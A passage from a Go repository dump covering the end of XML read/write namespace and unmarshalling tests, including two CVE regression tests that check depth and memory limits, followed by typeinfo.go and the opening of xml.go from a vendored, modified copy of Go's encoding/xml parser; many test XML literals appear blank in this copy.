` + ``, tab: Tables{}, ns: "something else entirely", }, } func TestUnmarshalNS(t *testing.T) { for i, tt := range tables { var dst Tables var err error if tt.ns != "" { d := NewDecoder(strings.NewReader(tt.xml)) d.DefaultSpace = tt.ns err = d.Decode(&dst) } else { err = Unmarshal([]byte(tt.xml), &dst) } if err != nil { t.Errorf("#%d: Unmarshal: %v", i, err) continue } want := tt.tab if dst != want { t.Errorf("#%d: dst=%+v, want %+v", i, dst, want) } } } func TestMarshalNS(t *testing.T) { dst := Tables{"hello", "world"} data, err := Marshal(&dst) if err != nil { t.Fatalf("Marshal: %v", err) } want := `hello
world
` str := string(data) if str != want { t.Errorf("have: %q\nwant: %q\n", str, want) } } type TableAttrs struct { TAttr TAttr } type TAttr struct { HTable string `xml:"http://www.w3.org/TR/html4/ table,attr"` FTable string `xml:"http://www.w3schools.com/furniture table,attr"` Lang string `xml:"http://www.w3.org/XML/1998/namespace lang,attr,omitempty"` Other1 string `xml:"http://golang.org/xml/ other,attr,omitempty"` Other2 string `xml:"http://golang.org/xmlfoo/ other,attr,omitempty"` Other3 string `xml:"http://golang.org/json/ other,attr,omitempty"` Other4 string `xml:"http://golang.org/2/json/ other,attr,omitempty"` } var tableAttrs = []struct { xml string tab TableAttrs ns string }{ { xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: "world"}}, }, { xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: "world"}}, }, { xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: "world"}}, }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: ""}}, }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "", FTable: "world"}}, }, { xml: ``, tab: TableAttrs{}, }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: ""}}, ns: "http://www.w3schools.com/furniture", }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "", FTable: "world"}}, ns: "http://www.w3.org/TR/html4/", }, { xml: ``, tab: TableAttrs{}, ns: "something else entirely", }, } func TestUnmarshalNSAttr(t *testing.T) { for i, tt := range tableAttrs { var dst TableAttrs var err error if tt.ns != "" { d := NewDecoder(strings.NewReader(tt.xml)) d.DefaultSpace = tt.ns err = d.Decode(&dst) } else { err = Unmarshal([]byte(tt.xml), &dst) } if err != nil { t.Errorf("#%d: Unmarshal: %v", i, err) continue } want := tt.tab if dst != want { t.Errorf("#%d: dst=%+v, want %+v", i, dst, want) } } } func TestMarshalNSAttr(t *testing.T) { src := TableAttrs{TAttr{"hello", "world", "en_US", "other1", "other2", "other3", "other4"}} data, err := Marshal(&src) if err != nil { t.Fatalf("Marshal: %v", err) } want := `` str := string(data) if str != want { t.Errorf("Marshal:\nhave: %#q\nwant: %#q\n", str, want) } var dst TableAttrs if err := Unmarshal(data, &dst); err != nil { t.Errorf("Unmarshal: %v", err) } if dst != src { t.Errorf("Unmarshal = %q, want %q", dst, src) } } type MyCharData struct { body string } func (m *MyCharData) UnmarshalXML(d *Decoder, start StartElement) error { for { t, err := d.Token() if err == io.EOF { // found end of element break } if err != nil { return err } if char, ok := t.(CharData); ok { m.body += string(char.data) } } return nil } var _ Unmarshaler = (*MyCharData)(nil) func (m *MyCharData) UnmarshalXMLAttr(attr Attr) error { panic("must not call") } type MyAttr struct { attr string } func (m *MyAttr) UnmarshalXMLAttr(attr Attr) error { m.attr = attr.Value return nil } var _ UnmarshalerAttr = (*MyAttr)(nil) type MyStruct struct { Data *MyCharData Attr *MyAttr `xml:",attr"` Data2 MyCharData Attr2 MyAttr `xml:",attr"` } func TestUnmarshaler(t *testing.T) { xml := ` hello world howdy world ` var m MyStruct if err := Unmarshal([]byte(xml), &m); err != nil { t.Fatal(err) } if m.Data == nil || m.Attr == nil || m.Data.body != "hello world" || m.Attr.attr != "attr1" || m.Data2.body != "howdy world" || m.Attr2.attr != "attr2" { t.Errorf("m=%#+v\n", m) } } type Pea struct { Cotelydon string } type Pod struct { Pea any `xml:"Pea"` } // https://golang.org/issue/6836 func TestUnmarshalIntoInterface(t *testing.T) { pod := new(Pod) pod.Pea = new(Pea) xml := `Green stuff` err := Unmarshal([]byte(xml), pod) if err != nil { t.Fatalf("failed to unmarshal %q: %v", xml, err) } pea, ok := pod.Pea.(*Pea) if !ok { t.Fatalf("unmarshaled into wrong type: have %T want *Pea", pod.Pea) } have, want := pea.Cotelydon, "Green stuff" if have != want { t.Errorf("failed to unmarshal into interface, have %q want %q", have, want) } } type X struct { D string `xml:",comment"` } // Issue 11112. Unmarshal must reject invalid comments. func TestMalformedComment(t *testing.T) { testData := []string{ "", "", "", "", } for i, test := range testData { data := []byte(test) v := new(X) if err := Unmarshal(data, v); err == nil { t.Errorf("%d: unmarshal should reject invalid comments", i) } } } type IXField struct { Five int `xml:"five"` NotInnerXML []string `xml:",innerxml"` } // Issue 15600. ",innerxml" on a field that can't hold it. func TestInvalidInnerXMLType(t *testing.T) { v := new(IXField) if err := Unmarshal([]byte(`5`), v); err != nil { t.Errorf("Unmarshal failed: got %v", err) } if v.Five != 5 { t.Errorf("Five = %v, want 5", v.Five) } if v.NotInnerXML != nil { t.Errorf("NotInnerXML = %v, want nil", v.NotInnerXML) } } type Child struct { G struct { I int } } type ChildToEmbed struct { X bool } type Parent struct { I int IPtr *int Is []int IPtrs []*int F float32 FPtr *float32 Fs []float32 FPtrs []*float32 B bool BPtr *bool Bs []bool BPtrs []*bool Bytes []byte BytesPtr *[]byte S string SPtr *string Ss []string SPtrs []*string MyI MyInt Child Child Children []Child ChildPtr *Child ChildToEmbed } const ( emptyXML = ` ` ) // golang.org/issues/13417 func TestUnmarshalEmptyValues(t *testing.T) { // Test first with a zero-valued dst. v := new(Parent) if err := Unmarshal([]byte(emptyXML), v); err != nil { t.Fatalf("zero: Unmarshal failed: got %v", err) } zBytes, zInt, zStr, zFloat, zBool := []byte{}, 0, "", float32(0), false want := &Parent{ IPtr: &zInt, Is: []int{zInt}, IPtrs: []*int{&zInt}, FPtr: &zFloat, Fs: []float32{zFloat}, FPtrs: []*float32{&zFloat}, BPtr: &zBool, Bs: []bool{zBool}, BPtrs: []*bool{&zBool}, Bytes: []byte{}, BytesPtr: &zBytes, SPtr: &zStr, Ss: []string{zStr}, SPtrs: []*string{&zStr}, Children: []Child{{}}, ChildPtr: new(Child), ChildToEmbed: ChildToEmbed{}, } if !reflect.DeepEqual(v, want) { t.Fatalf("zero: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } // Test with a pre-populated dst. // Multiple addressable copies, as pointer-to fields will replace value during unmarshal. vBytes0, vInt0, vStr0, vFloat0, vBool0 := []byte("x"), 1, "x", float32(1), true vBytes1, vInt1, vStr1, vFloat1, vBool1 := []byte("x"), 1, "x", float32(1), true vInt2, vStr2, vFloat2, vBool2 := 1, "x", float32(1), true v = &Parent{ I: vInt0, IPtr: &vInt1, Is: []int{vInt0}, IPtrs: []*int{&vInt2}, F: vFloat0, FPtr: &vFloat1, Fs: []float32{vFloat0}, FPtrs: []*float32{&vFloat2}, B: vBool0, BPtr: &vBool1, Bs: []bool{vBool0}, BPtrs: []*bool{&vBool2}, Bytes: vBytes0, BytesPtr: &vBytes1, S: vStr0, SPtr: &vStr1, Ss: []string{vStr0}, SPtrs: []*string{&vStr2}, MyI: MyInt(vInt0), Child: Child{G: struct{ I int }{I: vInt0}}, Children: []Child{{G: struct{ I int }{I: vInt0}}}, ChildPtr: &Child{G: struct{ I int }{I: vInt0}}, ChildToEmbed: ChildToEmbed{X: vBool0}, } if err := Unmarshal([]byte(emptyXML), v); err != nil { t.Fatalf("populated: Unmarshal failed: got %v", err) } want = &Parent{ IPtr: &zInt, Is: []int{vInt0, zInt}, IPtrs: []*int{&vInt0, &zInt}, FPtr: &zFloat, Fs: []float32{vFloat0, zFloat}, FPtrs: []*float32{&vFloat0, &zFloat}, BPtr: &zBool, Bs: []bool{vBool0, zBool}, BPtrs: []*bool{&vBool0, &zBool}, Bytes: []byte{}, BytesPtr: &zBytes, SPtr: &zStr, Ss: []string{vStr0, zStr}, SPtrs: []*string{&vStr0, &zStr}, Child: Child{G: struct{ I int }{I: vInt0}}, // I should == zInt0? (zero value) Children: []Child{{G: struct{ I int }{I: vInt0}}, {}}, ChildPtr: &Child{G: struct{ I int }{I: vInt0}}, // I should == zInt0? (zero value) } if !reflect.DeepEqual(v, want) { t.Fatalf("populated: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } } type WhitespaceValuesParent struct { BFalse bool BTrue bool I int INeg int I8 int8 I8Neg int8 I16 int16 I16Neg int16 I32 int32 I32Neg int32 I64 int64 I64Neg int64 UI uint UI8 uint8 UI16 uint16 UI32 uint32 UI64 uint64 F32 float32 F32Neg float32 F64 float64 F64Neg float64 } const whitespaceValuesXML = ` false true 266703 -266703 112 -112 6703 -6703 266703 -266703 266703 -266703 266703 112 6703 266703 266703 266.703 -266.703 266.703 -266.703 ` // golang.org/issues/22146 func TestUnmarshalWhitespaceValues(t *testing.T) { v := WhitespaceValuesParent{} if err := Unmarshal([]byte(whitespaceValuesXML), &v); err != nil { t.Fatalf("whitespace values: Unmarshal failed: got %v", err) } want := WhitespaceValuesParent{ BFalse: false, BTrue: true, I: 266703, INeg: -266703, I8: 112, I8Neg: -112, I16: 6703, I16Neg: -6703, I32: 266703, I32Neg: -266703, I64: 266703, I64Neg: -266703, UI: 266703, UI8: 112, UI16: 6703, UI32: 266703, UI64: 266703, F32: 266.703, F32Neg: -266.703, F64: 266.703, F64Neg: -266.703, } if v != want { t.Fatalf("whitespace values: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } } type WhitespaceAttrsParent struct { BFalse bool `xml:",attr"` BTrue bool `xml:",attr"` I int `xml:",attr"` INeg int `xml:",attr"` I8 int8 `xml:",attr"` I8Neg int8 `xml:",attr"` I16 int16 `xml:",attr"` I16Neg int16 `xml:",attr"` I32 int32 `xml:",attr"` I32Neg int32 `xml:",attr"` I64 int64 `xml:",attr"` I64Neg int64 `xml:",attr"` UI uint `xml:",attr"` UI8 uint8 `xml:",attr"` UI16 uint16 `xml:",attr"` UI32 uint32 `xml:",attr"` UI64 uint64 `xml:",attr"` F32 float32 `xml:",attr"` F32Neg float32 `xml:",attr"` F64 float64 `xml:",attr"` F64Neg float64 `xml:",attr"` } const whitespaceAttrsXML = ` ` // golang.org/issues/22146 func TestUnmarshalWhitespaceAttrs(t *testing.T) { v := WhitespaceAttrsParent{} if err := Unmarshal([]byte(whitespaceAttrsXML), &v); err != nil { t.Fatalf("whitespace attrs: Unmarshal failed: got %v", err) } want := WhitespaceAttrsParent{ BFalse: false, BTrue: true, I: 266703, INeg: -266703, I8: 112, I8Neg: -112, I16: 6703, I16Neg: -6703, I32: 266703, I32Neg: -266703, I64: 266703, I64Neg: -266703, UI: 266703, UI8: 112, UI16: 6703, UI32: 266703, UI64: 266703, F32: 266.703, F32Neg: -266.703, F64: 266.703, F64Neg: -266.703, } if v != want { t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } } // golang.org/issues/53350 func TestUnmarshalIntoNil(t *testing.T) { type T struct { A int `xml:"A"` } var nilPointer *T err := Unmarshal([]byte("1"), nilPointer) if err == nil { t.Fatalf("no error in unmarshaling") } } func TestCVE202228131(t *testing.T) { type nested struct { Parent *nested `xml:",any"` } var n nested err := Unmarshal(bytes.Repeat([]byte(""), maxUnmarshalDepth+1), &n) if err == nil { t.Fatal("Unmarshal did not fail") } else if !errors.Is(err, errUnmarshalDepth) { t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errUnmarshalDepth) } } func TestCVE202230633(t *testing.T) { if testing.Short() || runtime.GOARCH == "wasm" { t.Skip("test requires significant memory") } defer func() { p := recover() if p != nil { t.Fatal("Unmarshal panicked") } }() var example struct { Things []string } Unmarshal(bytes.Repeat([]byte(""), 17_000_000), &example) } ================================================ FILE: internal/thirdparty/xml/typeinfo.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "fmt" "reflect" "strings" "sync" ) // typeInfo holds details for the xml representation of a type. type typeInfo struct { xmlname *fieldInfo fields []fieldInfo } // fieldInfo holds details for the xml representation of a single field. type fieldInfo struct { idx []int name string xmlns string flags fieldFlags parents []string } type fieldFlags int const ( fElement fieldFlags = 1 << iota fAttr fCDATA fCharData fInnerXML fComment fAny fOmitEmpty fMode = fElement | fAttr | fCDATA | fCharData | fInnerXML | fComment | fAny xmlName = "XMLName" ) var tinfoMap sync.Map // map[reflect.Type]*typeInfo var nameType = reflect.TypeFor[Name]() // getTypeInfo returns the typeInfo structure with details necessary // for marshaling and unmarshaling typ. func getTypeInfo(typ reflect.Type) (*typeInfo, error) { if ti, ok := tinfoMap.Load(typ); ok { return ti.(*typeInfo), nil } tinfo := &typeInfo{} if typ.Kind() == reflect.Struct && typ != nameType { n := typ.NumField() for i := 0; i < n; i++ { f := typ.Field(i) if (!f.IsExported() && !f.Anonymous) || f.Tag.Get("xml") == "-" { continue // Private field } // For embedded structs, embed its fields. if f.Anonymous { t := f.Type if t.Kind() == reflect.Pointer { t = t.Elem() } if t.Kind() == reflect.Struct { inner, err := getTypeInfo(t) if err != nil { return nil, err } if tinfo.xmlname == nil { tinfo.xmlname = inner.xmlname } for _, finfo := range inner.fields { finfo.idx = append([]int{i}, finfo.idx...) if err := addFieldInfo(typ, tinfo, &finfo); err != nil { return nil, err } } continue } } finfo, err := structFieldInfo(typ, &f) if err != nil { return nil, err } if f.Name == xmlName { tinfo.xmlname = finfo continue } // Add the field if it doesn't conflict with other fields. if err := addFieldInfo(typ, tinfo, finfo); err != nil { return nil, err } } } ti, _ := tinfoMap.LoadOrStore(typ, tinfo) return ti.(*typeInfo), nil } // structFieldInfo builds and returns a fieldInfo for f. func structFieldInfo(typ reflect.Type, f *reflect.StructField) (*fieldInfo, error) { finfo := &fieldInfo{idx: f.Index} // Split the tag from the xml namespace if necessary. tag := f.Tag.Get("xml") if ns, t, ok := strings.Cut(tag, " "); ok { finfo.xmlns, tag = ns, t } // Parse flags. tokens := strings.Split(tag, ",") if len(tokens) == 1 { finfo.flags = fElement } else { tag = tokens[0] for _, flag := range tokens[1:] { switch flag { case "attr": finfo.flags |= fAttr case "cdata": finfo.flags |= fCDATA case "chardata": finfo.flags |= fCharData case "innerxml": finfo.flags |= fInnerXML case "comment": finfo.flags |= fComment case "any": finfo.flags |= fAny case "omitempty": finfo.flags |= fOmitEmpty } } // Validate the flags used. valid := true switch mode := finfo.flags & fMode; mode { case 0: finfo.flags |= fElement case fAttr, fCDATA, fCharData, fInnerXML, fComment, fAny, fAny | fAttr: if f.Name == xmlName || tag != "" && mode != fAttr { valid = false } default: // This will also catch multiple modes in a single field. valid = false } if finfo.flags&fMode == fAny { finfo.flags |= fElement } if finfo.flags&fOmitEmpty != 0 && finfo.flags&(fElement|fAttr) == 0 { valid = false } if !valid { return nil, fmt.Errorf("xml: invalid tag in field %s of type %s: %q", f.Name, typ, f.Tag.Get("xml")) } } // Use of xmlns without a name is not allowed. if finfo.xmlns != "" && tag == "" { return nil, fmt.Errorf("xml: namespace without name in field %s of type %s: %q", f.Name, typ, f.Tag.Get("xml")) } if f.Name == xmlName { // The XMLName field records the XML element name. Don't // process it as usual because its name should default to // empty rather than to the field name. finfo.name = tag return finfo, nil } if tag == "" { // If the name part of the tag is completely empty, get // default from XMLName of underlying struct if feasible, // or field name otherwise. if xmlname := lookupXMLName(f.Type); xmlname != nil { finfo.xmlns, finfo.name = xmlname.xmlns, xmlname.name } else { finfo.name = f.Name } return finfo, nil } // Prepare field name and parents. parents := strings.Split(tag, ">") if parents[0] == "" { parents[0] = f.Name } if parents[len(parents)-1] == "" { return nil, fmt.Errorf("xml: trailing '>' in field %s of type %s", f.Name, typ) } finfo.name = parents[len(parents)-1] if len(parents) > 1 { if (finfo.flags & fElement) == 0 { return nil, fmt.Errorf("xml: %s chain not valid with %s flag", tag, strings.Join(tokens[1:], ",")) } finfo.parents = parents[:len(parents)-1] } // If the field type has an XMLName field, the names must match // so that the behavior of both marshaling and unmarshaling // is straightforward and unambiguous. if finfo.flags&fElement != 0 { ftyp := f.Type xmlname := lookupXMLName(ftyp) if xmlname != nil && xmlname.name != finfo.name { return nil, fmt.Errorf("xml: name %q in tag of %s.%s conflicts with name %q in %s.XMLName", finfo.name, typ, f.Name, xmlname.name, ftyp) } } return finfo, nil } // lookupXMLName returns the fieldInfo for typ's XMLName field // in case it exists and has a valid xml field tag, otherwise // it returns nil. func lookupXMLName(typ reflect.Type) (xmlname *fieldInfo) { for typ.Kind() == reflect.Pointer { typ = typ.Elem() } if typ.Kind() != reflect.Struct { return nil } for i, n := 0, typ.NumField(); i < n; i++ { f := typ.Field(i) if f.Name != xmlName { continue } finfo, err := structFieldInfo(typ, &f) if err == nil && finfo.name != "" { return finfo } // Also consider errors as a non-existent field tag // and let getTypeInfo itself report the error. break } return nil } // addFieldInfo adds finfo to tinfo.fields if there are no // conflicts, or if conflicts arise from previous fields that were // obtained from deeper embedded structures than finfo. In the latter // case, the conflicting entries are dropped. // A conflict occurs when the path (parent + name) to a field is // itself a prefix of another path, or when two paths match exactly. // It is okay for field paths to share a common, shorter prefix. func addFieldInfo(typ reflect.Type, tinfo *typeInfo, newf *fieldInfo) error { var conflicts []int Loop: // First, figure all conflicts. Most working code will have none. for i := range tinfo.fields { oldf := &tinfo.fields[i] if oldf.flags&fMode != newf.flags&fMode { continue } if oldf.xmlns != "" && newf.xmlns != "" && oldf.xmlns != newf.xmlns { continue } minl := min(len(newf.parents), len(oldf.parents)) for p := 0; p < minl; p++ { if oldf.parents[p] != newf.parents[p] { continue Loop } } if len(oldf.parents) > len(newf.parents) { if oldf.parents[len(newf.parents)] == newf.name { conflicts = append(conflicts, i) } } else if len(oldf.parents) < len(newf.parents) { if newf.parents[len(oldf.parents)] == oldf.name { conflicts = append(conflicts, i) } } else { if newf.name == oldf.name && newf.xmlns == oldf.xmlns { conflicts = append(conflicts, i) } } } // Without conflicts, add the new field and return. if conflicts == nil { tinfo.fields = append(tinfo.fields, *newf) return nil } // If any conflict is shallower, ignore the new field. // This matches the Go field resolution on embedding. for _, i := range conflicts { if len(tinfo.fields[i].idx) < len(newf.idx) { return nil } } // Otherwise, if any of them is at the same depth level, it's an error. for _, i := range conflicts { oldf := &tinfo.fields[i] if len(oldf.idx) == len(newf.idx) { f1 := typ.FieldByIndex(oldf.idx) f2 := typ.FieldByIndex(newf.idx) return &TagPathError{typ, f1.Name, f1.Tag.Get("xml"), f2.Name, f2.Tag.Get("xml")} } } // Otherwise, the new field is shallower, and thus takes precedence, // so drop the conflicting fields from tinfo and append the new one. for c := len(conflicts) - 1; c >= 0; c-- { i := conflicts[c] copy(tinfo.fields[i:], tinfo.fields[i+1:]) tinfo.fields = tinfo.fields[:len(tinfo.fields)-1] } tinfo.fields = append(tinfo.fields, *newf) return nil } // A TagPathError represents an error in the unmarshaling process // caused by the use of field tags with conflicting paths. type TagPathError struct { Struct reflect.Type Field1, Tag1 string Field2, Tag2 string } func (e *TagPathError) Error() string { return fmt.Sprintf("%s field %q with tag %q conflicts with field %q with tag %q", e.Struct, e.Field1, e.Tag1, e.Field2, e.Tag2) } const ( initNilPointers = true dontInitNilPointers = false ) // value returns v's field value corresponding to finfo. // It's equivalent to v.FieldByIndex(finfo.idx), but when passed // initNilPointers, it initializes and dereferences pointers as necessary. // When passed dontInitNilPointers and a nil pointer is reached, the function // returns a zero reflect.Value. func (finfo *fieldInfo) value(v reflect.Value, shouldInitNilPointers bool) reflect.Value { for i, x := range finfo.idx { if i > 0 { t := v.Type() if t.Kind() == reflect.Pointer && t.Elem().Kind() == reflect.Struct { if v.IsNil() { if !shouldInitNilPointers { return reflect.Value{} } v.Set(reflect.New(v.Type().Elem())) } v = v.Elem() } } v = v.Field(x) } return v } ================================================ FILE: internal/thirdparty/xml/xml.go ================================================ // Copyright 2009 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package xml implements a simple XML 1.0 parser that // understands XML name spaces. // // Marshalling self-closing tags are not supported in Go. // https://github.com/golang/go/issues/21399 // With the current implementation, self-closing tags are expanded // to both StartElement and EndElement. // We would like to have our own implementation of decoder so that // self-closing tags are read and written with minimum diff. package xml // References: // Annotated XML spec: https://www.xml.com/axml/testaxml.htm // XML name spaces: https://www.w3.org/TR/REC-xml-names/ import ( "bufio" "bytes" "errors" "fmt" "io" "strconv" "strings" "unicode" "unicode/utf8" ) // A SyntaxError represents a syntax error in the XML input stream. type SyntaxError struct { Msg string Line int } func (e *SyntaxError) Error() string { return "XML syntax error on line " + strconv.Itoa(e.Line) + ": " + e.Msg } // A Name represents an XML name (Local) annotated // with a name space identifier (Space). // In tokens returned by [Decoder.Token], the Space identifier // is given as a canonical URL, not the short prefix used // in the document being parsed. type Name struct { Space, Local string } // An Attr represents an attribute in an XML element (Name=Value). type Attr struct { Name Name Value string Diff string // Diff whitespace between two attributes } // A Token is an interface holding one of the token types: // [StartElement], [EndElement], [CharData], [Comment], [ProcInst], or [Directive]. type Token any // A StartElement represents an XML start element. type StartElement struct { Name Name Attr []Attr Empty bool // Whether this is an empty element Diff string // Any extra space for empty element } // Copy creates a new copy of StartElement. func (e StartElement) Copy() StartElement { attrs := make([]Attr, len(e.Attr)) copy(attrs, e.Attr) e.Attr = attrs return e } // End returns the corresponding XML end element. func (e StartElement) End() EndElement { return EndElement{e.Name, e.Empty} } // An EndElement represents an XML end element. type EndElement struct { Name Name Empty bool } // A CharData represents XML character data (raw text). // XML escape sequences are replaced by the characters they represent in data. // origin holds the original text that escape sequences are not changed. // cdata indicates whether text 'CDATA' is in the raw text. type CharData struct { data []byte origin []byte cdata bool } // Copy creates a new copy of CharData. func (c CharData) Copy() CharData { return CharData{bytes.Clone(c.data), bytes.Clone(c.origin), c.cdata} } // A Comment represents an XML comment of the form . // The bytes do not include the comment markers. type Comment []byte // Copy creates a new copy of Comment. func (c Comment) Copy() Comment { return Comment(bytes.Clone(c)) } // A ProcInst represents an XML processing instruction of the form type ProcInst struct { Target string Inst []byte } // Copy creates a new copy of ProcInst. func (p ProcInst) Copy() ProcInst { p.Inst = bytes.Clone(p.Inst) return p } // A Directive represents an XML directive of the form . // The bytes do not include the markers. type Directive []byte // Copy creates a new copy of Directive. func (d Directive) Copy() Directive { return Directive(bytes.Clone(d)) } // CopyToken returns a copy of a Token. func CopyToken(t Token) Token { switch v := t.(type) { case CharData: return v.Copy() case Comment: return v.Copy() case Directive: return v.Copy() case ProcInst: return v.Copy() case StartElement: return v.Copy() } return t } // A TokenReader is anything that can decode a stream of XML tokens, including a // [Decoder]. // // When Token encounters an error or end-of-file condition after successfully // reading a token, it returns the token. It may return the (non-nil) error from // the same call or return the error (and a nil token) from a subsequent call. // An instance of this general case is that a TokenReader returning a non-nil // token at the end of the token stream may return either io.EOF or a nil error. // The next Read should return nil, [io.EOF]. // // Implementations of Token are discouraged from returning a nil token with a // nil error. Callers should treat a return of nil, nil as indicating that // nothing happened; in particular it does not indicate EOF. type TokenReader interface { Token() (Token, error) } // A Decoder represents an XML parser reading a particular input stream. // The parser assumes that its input is encoded in UTF-8. type Decoder struct { // Strict defaults to true, enforcing the requirements // of the XML specification. // If set to false, the parser allows input containing common // mistakes: // * If an element is missing an end tag, the parser invents // end tags as necessary to keep the return values from Token // properly balanced. // * In attribute values and character data, unknown or malformed // character entities (sequences beginning with &) are left alone. // // Setting: // // d.Strict = false // d.AutoClose = xml.HTMLAutoClose // d.Entity = xml.HTMLEntity // // creates a parser that can handle typical HTML. // // Strict mode does not enforce the requirements of the XML name spaces TR. // In particular it does not reject name space tags using undefined prefixes. // Such tags are recorded with the unknown prefix as the name space URL. Strict bool // When Strict == false, AutoClose indicates a set of elements to // consider closed immediately after they are opened, regardless // of whether an end element is present. AutoClose []string // Entity can be used to map non-standard entity names to string replacements. // The parser behaves as if these standard mappings are present in the map, // regardless of the actual map content: // // "lt": "<", // "gt": ">", // "amp": "&", // "apos": "'", // "quot": `"`, Entity map[string]string // CharsetReader, if non-nil, defines a function to generate // charset-conversion readers, converting from the provided // non-UTF-8 charset into UTF-8. If CharsetReader is nil or // returns an error, parsing stops with an error. One of the // CharsetReader's result values must be non-nil. CharsetReader func(charset string, input io.Reader) (io.Reader, error) // DefaultSpace sets the default name space used for unadorned tags, // as if the entire XML stream were wrapped in an element containing // the attribute xmlns="DefaultSpace". DefaultSpace string r io.ByteReader t TokenReader buf bytes.Buffer saved *bytes.Buffer stk *stack free *stack needClose bool toClose Name nextToken Token nextByte int ns map[string]string err error line int linestart int64 offset int64 unmarshalDepth int } // NewDecoder creates a new XML parser reading from r. // If r does not implement [io.ByteReader], NewDecoder will // do its own buffering. func NewDecoder(r io.Reader) *Decoder { d := &Decoder{ ns: make(map[string]string), nextByte: -1, line: 1, Strict: true, } d.switchToReader(r) return d } // NewTokenDecoder creates a new XML parser using an underlying token stream. func NewTokenDecoder(t TokenReader) *Decoder { // Is it already a Decoder? if d, ok := t.(*Decoder); ok { return d } d := &Decoder{ ns: make(map[string]string), t: t, nextByte: -1, line: 1, Strict: true, } return d } // Token returns the next XML token in the input stream. // At the end of the input stream, Token returns nil, [io.EOF]. // // Slices of bytes in the returned token data refer to the // parser's internal buffer and remain valid only until the next // call to Token. To acquire a copy of the bytes, call [CopyToken] // or the token's Copy method. // // Token expands self-closing elements such as
// into separate start and end elements returned by successive calls. // // Token guarantees that the [StartElement] and [EndElement] // tokens it returns are properly nested and matched: // if Token encounters an unexpected end element // or EOF before all expected end elements, // it will return an error. // // If [Decoder.CharsetReader] is called and returns an error, // the error is wrapped and returned. // // Token implements XML name spaces as described by // https://www.w3.org/TR/REC-xml-names/. Each of the // [Name] structures contained in the Token has the Space // set to the URL identifying its name space when known. // If Token encounters an unrecognized name space prefix, // it uses the prefix as the Space rather than report an error. func (d *Decoder) Token() (Token, error) { var t Token var err error if d.stk != nil && d.stk.kind == stkEOF { return nil, io.EOF } if d.nextToken != nil { t = d.nextToken d.nextToken = nil } else { if t, err = d.rawToken(); t == nil && err != nil { if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF { err = d.syntaxError("unexpected EOF") } return nil, err } // We still have a token to process, so clear any // errors (e.g. EOF) and proceed. err = nil } if !d.Strict { if t1, ok := d.autoClose(t); ok { d.nextToken = t t = t1 } } switch t1 := t.(type) { case StartElement: // In XML name spaces, the translations listed in the // attributes apply to the element name and // to the other attribute names, so process // the translations first. for _, a := range t1.Attr { if a.Name.Space == xmlnsPrefix { v, ok := d.ns[a.Name.Local] d.pushNs(a.Name.Local, v, ok) d.ns[a.Name.Local] = a.Value } if a.Name.Space == "" && a.Name.Local == xmlnsPrefix { // Default space for untagged names v, ok := d.ns[""] d.pushNs("", v, ok) d.ns[""] = a.Value } } d.pushElement(t1.Name) d.translate(&t1.Name, true) for i := range t1.Attr { d.translate(&t1.Attr[i].Name, false) } t = t1 case EndElement: if !d.popElement(&t1) { return nil, d.err } t = t1 } return t, err } const ( xmlURL = "http://www.w3.org/XML/1998/namespace" xmlnsPrefix = "xmlns" xmlPrefix = "xml" ) // Apply name space translation to name n. // The default name space (for Space=="") // applies only to element names, not to attribute names. func (d *Decoder) translate(n *Name, isElementName bool) { switch { case n.Space == xmlnsPrefix: return case n.Space == "" && !isElementName: return case n.Space == xmlPrefix: n.Space = xmlURL case n.Space == "" && n.Local == xmlnsPrefix: return } if v, ok := d.ns[n.Space]; ok { n.Space = v } else if n.Space == "" { n.Space = d.DefaultSpace } } func (d *Decoder) switchToReader(r io.Reader) { // Get efficient byte at a time reader. // Assume that if reader has its own // ReadByte, it's efficient enough. // Otherwise, use bufio. if rb, ok := r.(io.ByteReader); ok { d.r = rb } else { d.r = bufio.NewReader(r) } } // Parsing state - stack holds old name space translations // and the current set of open elements. The translations to pop when // ending a given tag are *below* it on the stack, which is // more work but forced on us by XML. type stack struct { next *stack kind int name Name ok bool } const ( stkStart = iota stkNs stkEOF ) func (d *Decoder) push(kind int) *stack { s := d.free if s != nil { d.free = s.next } else { s = new(stack) } s.next = d.stk s.kind = kind d.stk = s return s } func (d *Decoder) pop() *stack { s := d.stk if s != nil { d.stk = s.next s.next = d.free d.free = s } return s } // Record that after the current element is finished // (that element is already pushed on the stack) // Token should return EOF until popEOF is called. func (d *Decoder) pushEOF() { // Walk down stack to find Start. // It might not be the top, because there might be stkNs // entries above it. start := d.stk for start.kind != stkStart { start = start.next } // The stkNs entries below a start are associated with that // element too; skip over them. for start.next != nil && start.next.kind == stkNs { start = start.next } s := d.free if s != nil { d.free = s.next } else { s = new(stack) } s.kind = stkEOF s.next = start.next start.next = s } // Undo a pushEOF. // The element must have been finished, so the EOF should be at the top of the stack. func (d *Decoder) popEOF() bool { if d.stk == nil || d.stk.kind != stkEOF { return false } d.pop() return true } // Record that we are starting an element with the given name. func (d *Decoder) pushElement(name Name) { s := d.push(stkStart) s.name = name } // Record that we are changing the value of ns[local]. // The old value is url, ok. func (d *Decoder) pushNs(local string, url string, ok bool) { s := d.push(stkNs) s.name.Local = local s.name.Space = url s.ok = ok } // Creates a SyntaxError with the current line number. func (d *Decoder) syntaxError(msg string) error { return &SyntaxError{Msg: msg, Line: d.line} } // Record that we are ending an element with the given name. // The name must match the record at the top of the stack, // which must be a pushElement record. // After popping the element, apply any undo records from // the stack to restore the name translations that existed // before we saw this element. func (d *Decoder) popElement(t *EndElement) bool { s := d.pop() name := t.Name switch { case s == nil || s.kind != stkStart: d.err = d.syntaxError("unexpected end element ") return false case s.name.Local != 